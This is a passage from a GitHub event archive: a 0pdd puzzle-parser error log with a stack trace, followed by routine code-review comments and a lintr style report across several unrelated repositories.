[1]:\nbash: warning: setlocale: LC_ALL: cannot change locale (UTF-8)\n+ set -e\n+ set -o pipefail\n+ cd /tmp/0pdd20180717-4-1qdd3pf/fidals/refarm-site\n+ pdd -v -f /tmp/20180718-22796-xiuaxl\n\nMy version is 0.20.3\nRuby version is 2.3.3 at x86_64-linux\nReading /tmp/0pdd20180717-4-1qdd3pf/fidals/refarm-site\n212 file(s) found, 56 excluded\n/tmp/0pdd20180717-4-1qdd3pf/fidals/refarm-site/images/migrations/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180717-4-1qdd3pf/fidals/refarm-site/images/templatetags/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180717-4-1qdd3pf/fidals/refarm-site/pages/migrations/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180717-4-1qdd3pf/fidals/refarm-site/pages/templatetags/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180717-4-1qdd3pf/fidals/refarm-site/pages/management/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180717-4-1qdd3pf/fidals/refarm-site/pages/management/commands/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180717-4-1qdd3pf/fidals/refarm-site/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180717-4-1qdd3pf/fidals/refarm-site/tests/images/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180717-4-1qdd3pf/fidals/refarm-site/tests/images/assets/deer.jpg is a binary file (19044 bytes)\n/tmp/0pdd20180717-4-1qdd3pf/fidals/refarm-site/tests/images/assets/gold.jpg is a binary file (45940 bytes)\n/tmp/0pdd20180717-4-1qdd3pf/fidals/refarm-site/tests/migrations/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180717-4-1qdd3pf/fidals/refarm-site/tests/refarm_redirects/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180717-4-1qdd3pf/fidals/refarm-site/tests/pages/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180717-4-1qdd3pf/fidals/refarm-site/tests/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180717-4-1qdd3pf/fidals/refarm-site/tests/catalog/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180717-4-1qdd3pf/fidals/refarm-site/tests/ecommerce/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180717-4-1qdd3pf/fidals/refarm-site/tests/generic_admin/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180717-4-1qdd3pf/fidals/refarm-site/tests/fixtures/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180717-4-1qdd3pf/fidals/refarm-site/tests/search/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180717-4-1qdd3pf/fidals/refarm-site/tests/management/commands/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180717-4-1qdd3pf/fidals/refarm-site/catalog/views/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180717-4-1qdd3pf/fidals/refarm-site/catalog/migrations/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180717-4-1qdd3pf/fidals/refarm-site/catalog/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180717-4-1qdd3pf/fidals/refarm-site/catalog/templatetags/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180717-4-1qdd3pf/fidals/refarm-site/ecommerce/migrations/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180717-4-1qdd3pf/fidals/refarm-site/ecommerce/__init__.py is a binary file (1 bytes)\n/tmp/0pdd20180717-4-1qdd3pf/fidals/refarm-site/ecommerce/img/01.png is a binary file (247355 bytes)\n/tmp/0pdd20180717-4-1qdd3pf/fidals/refarm-site/ecommerce/img/02.png is a binary file (32719 bytes)\n/tmp/0pdd20180717-4-1qdd3pf/fidals/refarm-site/generic_admin/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180717-4-1qdd3pf/fidals/refarm-site/generic_admin/front/images/loading.gif is a binary file (1787 bytes)\n/tmp/0pdd20180717-4-1qdd3pf/fidals/refarm-site/generic_admin/front/images/ui-icons_777620_256x240.png is a binary file (3262 bytes)\n/tmp/0pdd20180717-4-1qdd3pf/fidals/refarm-site/generic_admin/front/images/ui-bg_flat_0_aaaaaa_40x100.png is a binary file (86 bytes)\n/tmp/0pdd20180717-4-1qdd3pf/fidals/refarm-site/generic_admin/front/images/ui-icons_cc0000_256x240.png is a binary file (3262 bytes)\n/tmp/0pdd20180717-4-1qdd3pf/fidals/refarm-site/generic_admin/front/images/jstree/throbber.gif is a binary file (1720 bytes)\n/tmp/0pdd20180717-4-1qdd3pf/fidals/refarm-site/generic_admin/front/images/jstree/32px.png is a binary file (1562 bytes)\n/tmp/0pdd20180717-4-1qdd3pf/fidals/refarm-site/generic_admin/front/images/jstree/40px.png is a binary file (5717 bytes)\n/tmp/0pdd20180717-4-1qdd3pf/fidals/refarm-site/generic_admin/front/images/ui-icons_444444_256x240.png is a binary file (3266 bytes)\n/tmp/0pdd20180717-4-1qdd3pf/fidals/refarm-site/generic_admin/front/images/ui-icons_777777_256x240.png is a binary file (3266 bytes)\n/tmp/0pdd20180717-4-1qdd3pf/fidals/refarm-site/generic_admin/front/images/ui-icons_555555_256x240.png is a binary file (3274 bytes)\n/tmp/0pdd20180717-4-1qdd3pf/fidals/refarm-site/generic_admin/front/images/ui-icons_ffffff_256x240.png is a binary file (3264 bytes)\n/tmp/0pdd20180717-4-1qdd3pf/fidals/refarm-site/search/migrations/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180717-4-1qdd3pf/fidals/refarm-site/search/__init__.py is a binary file (0 bytes)\nReading .gitignore...\nReading .travis.yml...\nReading images/migrations/0003_auto_20161027_0940.py...\nReading images/migrations/0005_auto_20170317_1457.py...\nReading images/migrations/0004_auto_20170124_1444.py...\nReading images/migrations/0001_initial.py...\nReading images/migrations/0006_auto_20170418_1615.py...\nReading images/migrations/0002_alter_fields.py...\nReading images/__init__.py...\nReading images/templatetags/images.py...\nReading images/models.py...\nReading images/apps.py...\nReading refarm_redirects/middleware.py...\nReading refarm_redirects/__init__.py...\nReading refarm_redirects/apps.py...\nReading pages/utils.py...\nReading pages/urls.py...\nReading pages/migrations/0006_remove_redundant_fields.py...\nReading pages/migrations/0005_db_refactor.py...\nReading pages/migrations/0009_pages_mptt.py...\nReading pages/migrations/0004_auto_20160909_1100.py...\nReading pages/migrations/0002_auto_20160829_1730.py...\nReading pages/migrations/0003_auto_20160909_0747.py...\nReading pages/migrations/0008_add_db_index.py...\nReading pages/migrations/0010_rebuild_pages_tree.py...\nReading pages/migrations/0007_rename_private_field.py...\nReading pages/migrations/0001_initial.py...\nReading pages/migrations/0015_add_validation_to_template.py...\nReading pages/migrations/0011_title_to_text_field.py...\nReading pages/migrations/0013_auto_20170317_1457.py...\nReading pages/migrations/0014_auto_20170504_0944.py...\nReading pages/migrations/0012_auto_20170301_0020.py...\nReading pages/__init__.py...\nReading pages/templatetags/pages_extras.py...\nReading pages/views.py...\nReading pages/models.py...\nReading pages/README.md...\nReading pages/apps.py...\nReading pages/templates/robots.txt...\nReading pages/templates/pages/breadcrumbs.html...\nReading pages/templates/pages/breadcrumbs_with_siblings.html...\nReading pages/templates/pages/accordion.html...\nReading pages/templates/pages/sitemap.html...\nReading pages/templates/pages/page.html...\nReading pages/templates/index/index.html...\nReading pages/management/commands/get_app_path_for_gulp.py...\nReading pages/management/commands/custom_pages.py...\nReading .editorconfig...\nReading docker/Dockerfile.python...\nReading docker/docker-compose.yml...\nReading docker/.env.dist...\nReading tests/urls.py...\nReading tests/images/tests.py...\nReading tests/migrations/0001_initial.py...\nReading tests/refarm_redirects/test_views.py...\nERROR: tests/refarm_redirects/test_views.py; puzzle at line #1; @todo found, but puzzle can't be parsed, most probably because @todo is not followed by a puzzle marker, as this page explains: https://github.com/yegor256/pdd#how-to-format. If you can't understand the cause of this issue or you don't know how to fix it, please submit a GitHub issue, we will try to help you: https://github.com/yegor256/pdd/issues. This tool is still in its beta version and we will appreciate your feedback. Here is where you can find more documentation: https://github.com/yegor256/pdd/blob/master/README.md.\nExit code is 1\n\n/app/objects/git_repo.rb:66:in `rescue in block in xml'\n/app/objects/git_repo.rb:63:in `block in xml'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/tempfile.rb:295:in `open'\n/app/objects/git_repo.rb:62:in `xml'\n/app/objects/puzzles.rb:36:in `deploy'\n/app/objects/job.rb:38:in `proceed'\n/app/objects/job_starred.rb:33:in `proceed'\n/app/objects/job_recorded.rb:32:in `proceed'\n/app/objects/job_emailed.rb:35:in `proceed'\n/app/objects/job_commiterrors.rb:36:in `proceed'\n/app/objects/job_detached.rb:48:in `exclusive'\n/app/objects/job_detached.rb:36:in `block in proceed'\n/app/objects/job_detached.rb:36:in `fork'\n/app/objects/job_detached.rb:36:in `proceed'\n/app/0pdd.rb:342:in `block in <top (required)>'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1634:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1634:in `block in compile!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:992:in `block (3 levels) in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1011:in `route_eval'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:992:in `block (2 levels) in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1039:in `block in process_route'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1037:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1037:in `process_route'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:990:in `block in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:989:in `each'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:989:in `route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1096:in `block in dispatch!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `block in invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1093:in `dispatch!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:924:in `block in call!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `block in invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:924:in `call!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:913:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/xss_header.rb:18:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/path_traversal.rb:16:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/json_csrf.rb:26:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/base.rb:50:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/base.rb:50:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/frame_options.rb:31:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/logger.rb:15:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/common_logger.rb:33:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:231:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:224:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/head.rb:12:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/method_override.rb:22:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:194:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1957:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1501:in `block in call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1728:in `synchronize'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1501:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/handler/webrick.rb:86:in `service'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/httpserver.rb:140:in `service'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/httpserver.rb:96:in `run'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/server.rb:296:in `block in start_thread'\n```"}},"created_at":"2018-07-18T04:11:51Z"}
{"id":"7980536469","type":"CommitCommentEvent","actor":{"login":"Jkl921122"},"repo":{"name":"Jkl921122/test"},"payload":{"comment":{"id":29743783,"position":null,"line":null,"path":null,"commit_id":"1047cc0a6ef4e8c368da057c21afd59585bd2f4d","created_at":"2018-07-18T04:11:56Z","updated_at":"2018-07-18T04:11:56Z","author_association":"OWNER","body":"111"}},"created_at":"2018-07-18T04:11:56Z"}
{"id":"7980537148","type":"CommitCommentEvent","actor":{"login":"jedbrown"},"repo":{"name":"path1380/FEM_Parth"},"payload":{"comment":{"id":29743785,"position":313,"line":661,"path":"src/main.f90","commit_id":"eec0af2b4abcf8e5506dd1bf982ea219073f7e34","created_at":"2018-07-18T04:12:14Z","updated_at":"2018-07-18T04:12:14Z","author_association":"COLLABORATOR","body":"PETSc vectors aren't intended for these tiny element vectors and you aren't really using PETSc functionality here so you can just use an array."}},"created_at":"2018-07-18T04:12:14Z"}
{"id":"7980538583","type":"CommitCommentEvent","actor":{"login":"vishalnagda1"},"repo":{"name":"vishalnagda1/react_todo_app"},"payload":{"comment":{"id":29743791,"position":28,"line":96,"path":"src/components/todo.js","commit_id":"d0ba71e5f5e89f92ba864035469a23f2c896342d","created_at":"2018-07-18T04:12:53Z","updated_at":"2018-07-18T04:12:53Z","author_association":"OWNER","body":"done the required changes."}},"created_at":"2018-07-18T04:12:53Z"}
{"id":"7980542363","type":"CommitCommentEvent","actor":{"login":"jedbrown"},"repo":{"name":"path1380/FEM_Parth"},"payload":{"comment":{"id":29743818,"position":324,"line":672,"path":"src/main.f90","commit_id":"eec0af2b4abcf8e5506dd1bf982ea219073f7e34","created_at":"2018-07-18T04:14:32Z","updated_at":"2018-07-18T04:14:32Z","author_association":"COLLABORATOR","body":"An iterative solve isn't really appropriate for something so small. But you shouldn't need any solves here. Just write your global residual (which internally traverses over elements) and let the outer solver handle it. (What you have implemented here looks kind of like a nonlinear domain decomposition method. Those can have a place, but let's not start there.)"}},"created_at":"2018-07-18T04:14:32Z"}
{"id":"7980543372","type":"CommitCommentEvent","actor":{"login":"arikrupnik"},"repo":{"name":"arikrupnik/the-heir"},"payload":{"comment":{"id":29743819,"position":77,"line":123,"path":"the-heir.fountain","commit_id":"849fcdee6d15f87bd70522807933016bd6049f41","created_at":"2018-07-18T04:14:57Z","updated_at":"2018-07-18T04:14:57Z","author_association":"OWNER","body":"I expect you want this to be a character name. It needs to be in ALL CAPS (fountain allows overriding this rule, but I recommend just following it)"}},"created_at":"2018-07-18T04:14:57Z"}
{"id":"7980544537","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18027/programming-term2"},"payload":{"comment":{"id":29743823,"position":null,"line":null,"path":null,"commit_id":"3c8c2196f1a4380db7bb21fad0fadf4c4719c544","created_at":"2018-07-18T04:15:24Z","updated_at":"2018-07-18T04:15:24Z","author_association":"NONE","body":"7/12課題\r\n綺麗に整形されていますね。修正お疲れ様でした。OKです。\r\n\r\nあえて1つだけ超細かいこと言っておくと、計算結果の出力部分でendに1バイトスペースを指定してるので、n*9の計算結果の後に1バイトスペースが入る結果になってます。(コンソール上パッと見はわかりませんが)"}},"created_at":"2018-07-18T04:15:24Z"}
{"id":"7980546612","type":"CommitCommentEvent","actor":{"login":"jedbrown"},"repo":{"name":"path1380/FEM_Parth"},"payload":{"comment":{"id":29743825,"position":42,"line":269,"path":"src/local_mat.f90","commit_id":"046adf71f5bfed549cf89ba39d101ad8eb6e221d","created_at":"2018-07-18T04:16:17Z","updated_at":"2018-07-18T04:16:17Z","author_association":"COLLABORATOR","body":"Why no off-diagonal contribution?"}},"created_at":"2018-07-18T04:16:17Z"}
{"id":"7980546727","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18027/programming-term2"},"payload":{"comment":{"id":29743827,"position":null,"line":null,"path":null,"commit_id":"3c8c2196f1a4380db7bb21fad0fadf4c4719c544","created_at":"2018-07-18T04:16:19Z","updated_at":"2018-07-18T04:16:19Z","author_association":"NONE","body":"7/17課題\r\nOKです。内容が面白くて好きです。\r\nラッキーカラーが紅に染まってますね。笑"}},"created_at":"2018-07-18T04:16:19Z"}
{"id":"7980547309","type":"CommitCommentEvent","actor":{"login":"arikrupnik"},"repo":{"name":"arikrupnik/the-heir"},"payload":{"comment":{"id":29743830,"position":11,"line":15,"path":"the-heir.fountain","commit_id":"849fcdee6d15f87bd70522807933016bd6049f41","created_at":"2018-07-18T04:16:34Z","updated_at":"2018-07-18T04:16:34Z","author_association":"OWNER","body":"I'm curious about adding a new master scene header here. Typically, a new scene indicates a change in either time or location. This action is continuing without a break in either."}},"created_at":"2018-07-18T04:16:34Z"}
{"id":"7980548335","type":"CommitCommentEvent","actor":{"login":"jacobrgardner"},"repo":{"name":"cornellius-gp/gpytorch"},"payload":{"comment":{"id":29743835,"position":18,"line":18,"path":"gpytorch/gpytorchopt/gpytorchopt/bayesian_optimization.py","commit_id":"3d4d937590fdb4b2a4a18cac7249af30b78ed949","created_at":"2018-07-18T04:17:03Z","updated_at":"2018-07-18T04:17:03Z","author_association":"MEMBER","body":"I think that sounds like a good plan. As a note, with the exception of a few actual applications, most of my experience running BayesOpt is on the kind of experiments you run for a paper, not really the kind of things you find in a production environment. As a result, I'm pretty okay with deferring to you guys on interface and data handling choices :-). \r\n\r\nThe code here is essentially a port of the code I'd written for the additive structure paper. I was hoping that writing a few simple bayesopt examples would help shine light on what things are still lacking in GPyTorch as a whole for bayesopt functionality."}},"created_at":"2018-07-18T04:17:03Z"}
{"id":"7980548706","type":"CommitCommentEvent","actor":{"login":"dastanabeuov"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29743836,"position":4,"line":4,"path":"1-Osnovy-Ruby-polnaya-PO/lesson5/module.rb","commit_id":"a6fe583efd143cc580fcc26aa93eaedd044e86d3","created_at":"2018-07-18T04:17:13Z","updated_at":"2018-07-18T04:17:13Z","author_association":"OWNER","body":"Ups prostite...ya vchera spesha otpravil ne tu papku. Ispravil"}},"created_at":"2018-07-18T04:17:13Z"}
{"id":"7980549189","type":"CommitCommentEvent","actor":{"login":"jedbrown"},"repo":{"name":"path1380/FEM_Parth"},"payload":{"comment":{"id":29743837,"position":32,"line":259,"path":"src/local_mat.f90","commit_id":"046adf71f5bfed549cf89ba39d101ad8eb6e221d","created_at":"2018-07-18T04:17:24Z","updated_at":"2018-07-18T04:17:24Z","author_association":"COLLABORATOR","body":"This is rather expensive to recompute for every element. Normally it would be computed only once."}},"created_at":"2018-07-18T04:17:24Z"}
{"id":"7980550767","type":"CommitCommentEvent","actor":{"login":"arikrupnik"},"repo":{"name":"arikrupnik/the-heir"},"payload":{"comment":{"id":29743842,"position":18,"line":20,"path":"the-heir.fountain","commit_id":"849fcdee6d15f87bd70522807933016bd6049f41","created_at":"2018-07-18T04:18:06Z","updated_at":"2018-07-18T04:18:06Z","author_association":"OWNER","body":"Whitespace is significant in many parts of the Fountain spec. Here, the change makes no difference, but you have to look closely to know that it doesn't. As a rule, I recommend against spurious whitespace changes."}},"created_at":"2018-07-18T04:18:06Z"}
{"id":"7980552519","type":"CommitCommentEvent","actor":{"login":"dastanabeuov"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29743846,"position":11,"line":11,"path":"1-Osnovy-Ruby-polnaya-PO/lesson5/module.rb","commit_id":"a6fe583efd143cc580fcc26aa93eaedd044e86d3","created_at":"2018-07-18T04:18:51Z","updated_at":"2018-07-18T04:18:51Z","author_association":"OWNER","body":"ok ispravlyayu...tut ne ulovil moment"}},"created_at":"2018-07-18T04:18:51Z"}
{"id":"7980554191","type":"CommitCommentEvent","actor":{"login":"malarozi"},"repo":{"name":"malarozi/iOS-11.1.2-15B202-Jailbreak"},"payload":{"comment":{"id":29743850,"position":null,"line":null,"path":null,"commit_id":"f10b80883ed35503730c95ecec6afd96f03f0ffa","created_at":"2018-07-18T04:19:35Z","updated_at":"2018-07-18T04:19:35Z","author_association":"OWNER","body":"f10b808"}},"created_at":"2018-07-18T04:19:35Z"}
{"id":"7980554204","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"s18011/programming-term2"},"payload":{"comment":{"id":29743851,"position":null,"line":null,"path":null,"commit_id":"ba9facf41cfe5f5b8630bbb5d83093e036c02a3b","created_at":"2018-07-18T04:19:35Z","updated_at":"2018-07-18T04:19:35Z","author_association":"NONE","body":"課題2について\r\n\r\nメイン処理のコードがまったく書かれていません。これでは動かしても何も出力されないでしょう。\r\n当然NGです。ちゃんと動作させて結果を見たものを提出してください。\r\n本日7/18の講義中に修正して再提出のこと。"}},"created_at":"2018-07-18T04:19:35Z"}
{"id":"7980555115","type":"CommitCommentEvent","actor":{"login":"SoloSynth1"},"repo":{"name":"SoloSynth1/vba-study"},"payload":{"comment":{"id":29743852,"position":7,"line":32,"path":"Trial/ThisWorkbook.cls","commit_id":"59e50f40019f54a84e5fc03d3acbff9701bd177d","created_at":"2018-07-18T04:19:57Z","updated_at":"2018-07-18T04:19:57Z","author_association":"OWNER","body":"Why is it needed?"}},"created_at":"2018-07-18T04:19:57Z"}
{"id":"7980555602","type":"CommitCommentEvent","actor":{"login":"dastanabeuov"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29743853,"position":5,"line":5,"path":"1-Osnovy-Ruby-polnaya-PO/lesson5/station.rb","commit_id":"a6fe583efd143cc580fcc26aa93eaedd044e86d3","created_at":"2018-07-18T04:20:09Z","updated_at":"2018-07-18T04:20:09Z","author_association":"OWNER","body":"Tut takje papku ne tu vstavil...ispravil otpravil na proverku"}},"created_at":"2018-07-18T04:20:09Z"}
{"id":"7980556450","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"PredictiveEcology/NetLogoR"},"payload":{"comment":{"id":29743855,"position":null,"line":null,"path":null,"commit_id":"bc3a18ff2853838085c6bc1b287c04e74b0f1437","created_at":"2018-07-18T04:20:28Z","updated_at":"2018-07-18T04:20:28Z","author_association":"NONE","body":"[inst/examples/Wolf-Sheep-Predation/WolfSheepPredation/WolfSheepPredation.R:64:1:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/inst/examples/Wolf-Sheep-Predation/WolfSheepPredation/WolfSheepPredation.R#L64) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.WolfSheepPredation <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/Wolf-Sheep-Predation/WolfSheepPredation/WolfSheepPredation.R:113:1:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/inst/examples/Wolf-Sheep-Predation/WolfSheepPredation/WolfSheepPredation.R#L113) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​WolfSheepPredationInit <- function(sim) {\n^~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/Wolf-Sheep-Predation/WolfSheepPredation/WolfSheepPredation.R:185:1:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/inst/examples/Wolf-Sheep-Predation/WolfSheepPredation/WolfSheepPredation.R#L185) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​WolfSheepPredationSave <- function(sim) {\n^~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/Wolf-Sheep-Predation/WolfSheepPredation/WolfSheepPredation.R:200:1:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/inst/examples/Wolf-Sheep-Predation/WolfSheepPredation/WolfSheepPredation.R#L200) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​WolfSheepPredationPosition <- function(sim) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/Wolf-Sheep-Predation/WolfSheepPredation/WolfSheepPredation.R:220:1:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/inst/examples/Wolf-Sheep-Predation/WolfSheepPredation/WolfSheepPredation.R#L220) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​WolfSheepPredationPopSize <- function(sim) {\n^~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/Wolf-Sheep-Predation/WolfSheepPredation/WolfSheepPredation.R:243:1:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/inst/examples/Wolf-Sheep-Predation/WolfSheepPredation/WolfSheepPredation.R#L243) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​WolfSheepPredationEvent <- function(sim){\n^~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/agentMatrix-Class-methods.R:15:12:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/agentMatrix-Class-methods.R#L15) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  function(.Object=\"agentMatrix\", coords, ..., levelsAM) {\n           ^~~~~~~\n```\n[R/agentMatrix-Class-methods.R:16:5:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/agentMatrix-Class-methods.R#L16) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    Coords <- TRUE\n    ^~~~~~\n```\n[R/agentMatrix-Class-methods.R:29:7:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/agentMatrix-Class-methods.R#L29) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      Coords <- FALSE\n      ^~~~~~\n```\n[R/agentMatrix-Class-methods.R:395:6:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/agentMatrix-Class-methods.R#L395) *style:* **Commented code should be removed.**\n```r\n​    #charCols <- match(j, nam)\n     ^~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/agentMatrix-Class-methods.R:396:6:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/agentMatrix-Class-methods.R#L396) *style:* **Commented code should be removed.**\n```r\n​    #charCols <- match(nam, j)\n     ^~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/agentMatrix-Class-methods.R:397:34:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/agentMatrix-Class-methods.R#L397) *style:* **Commented code should be removed.**\n```r\n​    numCols <- which(!charCols) #colNums[!(colNums %in% charCols)]\n                                 ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/agentMatrix-Class-methods.R:404:8:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/agentMatrix-Class-methods.R#L404) *style:* **Commented code should be removed.**\n```r\n​      #numColsJ <- which(colNums %in% numCols)\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/agentMatrix-Class-methods.R:409:8:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/agentMatrix-Class-methods.R#L409) *style:* **Commented code should be removed.**\n```r\n​      #charColsJ <- which(colNums %in% charCols)\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/agentMatrix-Class-methods.R:609:1:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/agentMatrix-Class-methods.R#L609) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​head.agentMatrix <- function(x, n = 6L, ...) 